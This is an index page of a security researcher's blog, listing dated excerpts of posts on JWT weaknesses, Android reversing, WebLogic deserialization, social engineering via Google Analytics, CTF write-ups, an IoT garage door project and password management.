Android Reversing to Find JWT Key

February 06, 2018

In the previous blog post, I discussed JWTs and their common vulnerabilities. There, I mentioned a recent engagement where I discovered an Android application signing JWTs using HS512 on the client side, which set in motion a hunt to find the symmetric key and forge modified JWTs. This blog post will cover the basic Android hacking techniques and methodology used along the way. If you are new to Android application testing, this blog post will be a great resource to learn from!

JWT Hacking 101

December 07, 2017

As JavaScript continues its quest for world domination, JSON Web Tokens (JWTs) are becoming more and more prevalent in application security.  Many applications use them, so it has become very important for me to know as much as I can and I want to share what I’ve learned. In this blog post I will discuss…

Code Featured on Mr. Robot (USA Network)

November 30, 2017

Last night’s episode of Mr. Robot (eps3.6_fredrick+tanya.chk) contained some code I wrote for a WebLogic deserialization vulnerability in my earlier blog post, Hands on with WebLogic Serialization Vulnerability. I still can’t quite believe it!   Chris Frohoff‏ (@frohoff ) the author of the “ysoserial” deserialization tool caught it and tagged me on Twitter. Much thanks to him…

SE Village @ DC25: Social Engineering with Web Analytics

July 31, 2017

This weekend I was lucky enough to have the opportunity to speak at the Social Engineering Village at DefCon25. I gave a talk regarding my research with using Google Analytics for social engineering. I made a new tool called google-analytics-attack-ng that has many new features compared to its predecessor in my previous blog post. In addition to…

Building IoT: A Hacker’s Journey

May 02, 2017

Being a first time home owner means a lot of different things, but in particular I’ve found it means fixing a lot of things. A garage door opener has been on my fix-it list for a while and I finally got around to solving it! This blog post will cover the IoT device I created and the security protections I baked in along the way!

DakotaCon 2017 CTF Write Ups

April 12, 2017

I was able to attend DakotaCon in Madison, SD again this year and staying true to the precedent from last year, it was a great time! The time I didn’t spend in the talks or training was spent on the CTF, of which my team and I were able to complete in 1st place! This blog post contains write-ups for various challenges.

Magic Mirror with DNS Filtering

February 06, 2017

Over a year ago I came across a Raspberry Pi project called Magic Mirror. The project uses a one-way mirror to overlay a reflective property on a computer monitor, while allowing display elements to “magically” appear on the mirror. I liked this project and went ahead and built my own, but with a twist. This blog post will briefly cover my Magic Mirror build and how I use it to manage and filter DNS on my network.

Social Engineering with Google Analytics

September 25, 2016

If a sophisticated attacker could flood a victim’s Google Analytics portal with referrals from a domain the attacker controls, a victim may investigate the referrals and browse to the attacker controlled domain. Sneaky! This blog post will covers the development and a usage of a Social Engineering Toolkit (SET) module I wrote called “Google Analytics Attack”.

Referer Redirection and Its Inconspicuous Danger

August 16, 2016

Recently I noticed some peculiar behavior on a web application; it would openly redirect to whatever the ‘Referer’ header was set to in the request. At first I though that seemed pretty harmless, but after recognizing it as unsanitized input, I was determined to come up with a use-case as for when this behavior could be used for evil.

KeePass and Eating Your Own Dog Food

July 21, 2016

For a while now the information security community has been griping about the need for better passwords. I decided it was time to ‘eat my own dog food’ and take my personal password security to the next level by using KeePass.